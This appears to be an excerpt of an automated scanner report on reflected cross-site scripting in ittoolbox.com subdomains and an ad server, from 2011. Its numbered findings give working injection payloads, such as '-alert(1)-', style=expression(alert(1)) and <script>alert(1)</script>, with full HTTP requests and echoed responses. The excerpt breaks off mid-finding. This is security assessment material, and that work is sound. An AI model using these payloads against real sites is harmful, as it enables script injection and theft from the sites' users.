<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Groups
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7358f'-alert(1)-'29ad29ac991 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people7358f'-alert(1)-'29ad29ac991/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114921 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3f7358f'-alert(1)-'29ad29ac991%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.92. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabb0'-alert(1)-'c1d1138c1b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people/?eabb0'-alert(1)-'c1d1138c1b9=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114677 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3feabb0'-alert(1)-'c1d1138c1b9%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f043b'-alert(1)-'d674dcd1e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /peoplef043b'-alert(1)-'d674dcd1e76/dentrekin/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 114986 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> People Sear ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fPeopleSearch.aspx%3ff043b'-alert(1)-'d674dcd1e76%2fdentrekin%2f'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
3.94. http://it.toolbox.com/people/dentrekin/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/dentrekin/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb6e'-alert(1)-'20fe7c87edd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /people/dentrekin/?abb6e'-alert(1)-'20fe7c87edd=1 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 58420 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:48:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Demian Entr ...[SNIP]... ed) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fpeople%2fProfile.aspx%3fdisplayname%3ddentrekin%26abb6e'-alert(1)-'20fe7c87edd%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.95. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://java.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c3c'-alert(1)-'dbbea786b9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14c3c'-alert(1)-'dbbea786b9c=1 HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59272 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=puv12c55hmsicw45dskys2un; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:13 GMT Connection: close
3.96. http://java.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://java.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23ef5"style="x:expression(alert(1))"fb0ed0c9733 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?23ef5"style%3d"x%3aexpression(alert(1))"fb0ed0c9733=1 HTTP/1.1 Host: java.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 59387 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s3wuxj45cit3vrfhkfjgtc2h; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:09 GMT Connection: close
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 97096<script>alert(1)</script>431b4ab0e87 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87&num=5&layt=560x350v1&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:54:39 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 26 Jan 2011 14:54:39 GMT Content-Type: application/x-javascript Content-Length: 82
// Error: Unknown old section TOOLBOX_ROS97096<script>alert(1)</script>431b4ab0e87
3.98. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c24a9<script>alert(1)</script>bc533aa9af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp&c24a9<script>alert(1)</script>bc533aa9af=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 26 Jan 2011 14:54:45 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 26 Jan 2011 14:54:45 GMT Content-Type: application/x-javascript Content-Length: 68
3.99. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://knowledgemanagement.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24513"style="x:expression(alert(1))"6e9c15464a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?24513"style%3d"x%3aexpression(alert(1))"6e9c15464a3=1 HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71503 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=xru5eafarzxxbh45vosz4u45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://knowledgemanagement.ittoolbox.com/Default.aspx?24513"style="x:expression(alert(1))"6e9c15464a3=1" /> ...[SNIP]...
3.100. http://knowledgemanagement.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://knowledgemanagement.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b1ec'-alert(1)-'613ef07e3c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8b1ec'-alert(1)-'613ef07e3c0=1 HTTP/1.1 Host: knowledgemanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71379 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pognpffpdtxcyyyvqhl1t4mr; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Knowledge M ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fknowledgemanagement.ittoolbox.com%2fDefault.aspx%3f8b1ec'-alert(1)-'613ef07e3c0%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.101. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://linux.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5b1a'-alert(1)-'1ab6b4baf8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b5b1a'-alert(1)-'1ab6b4baf8e=1 HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72738 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=czqz3pfmadoitl55tflz5z45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2flinux.ittoolbox.com%2fDefault.aspx%3fb5b1a'-alert(1)-'1ab6b4baf8e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.102. http://linux.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://linux.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as caa37"style="x:expression(alert(1))"6417fbb4293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?caa37"style%3d"x%3aexpression(alert(1))"6417fbb4293=1 HTTP/1.1 Host: linux.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72853 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=datgxxzqmexdo5qyjrao4gur; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Linux Commu ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://linux.ittoolbox.com/Default.aspx?caa37"style="x:expression(alert(1))"6417fbb4293=1" /> ...[SNIP]...
3.103. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://networking.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fef2c'-alert(1)-'f02e1021037 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fef2c'-alert(1)-'f02e1021037=1 HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91891 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=a3uzlqvxnlhivdrz04yt0mmb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:37 GMT Connection: close
3.104. http://networking.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://networking.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfd60"style="x:expression(alert(1))"71a53d9ebfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cfd60"style%3d"x%3aexpression(alert(1))"71a53d9ebfe=1 HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92006 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sxo2pe2p42mght553estfm45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Networking ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://networking.ittoolbox.com/Default.aspx?cfd60"style="x:expression(alert(1))"71a53d9ebfe=1" /> ...[SNIP]...
3.105. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracle.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c2f"style="x:expression(alert(1))"e4fee16d211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?89c2f"style%3d"x%3aexpression(alert(1))"e4fee16d211=1 HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78373 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lau5lk55ph141tnfnn3hg4ra; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://oracle.ittoolbox.com/Default.aspx?89c2f"style="x:expression(alert(1))"e4fee16d211=1" /> ...[SNIP]...
3.106. http://oracle.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracle.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4e1'-alert(1)-'3a93052e948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2b4e1'-alert(1)-'3a93052e948=1 HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78256 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=0dsxwmvpz4gckl553jtpamv2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Oracle Comm ...[SNIP]... er != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2foracle.ittoolbox.com%2fDefault.aspx%3f2b4e1'-alert(1)-'3a93052e948%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.107. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesoft.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35918"style%3d"x%3aexpression(alert(1))"3060ac84ade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35918"style="x:expression(alert(1))"3060ac84ade in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?35918"style%3d"x%3aexpression(alert(1))"3060ac84ade=1 HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71238 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=i3igbt55zmfzngqpx3zc25jr; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> PeopleSoft ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://peoplesoft.ittoolbox.com/Default.aspx?35918"style="x:expression(alert(1))"3060ac84ade=1" /> ...[SNIP]...
3.108. http://peoplesoft.ittoolbox.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://peoplesoft.ittoolbox.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61edb'-alert(1)-'896663fa1e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
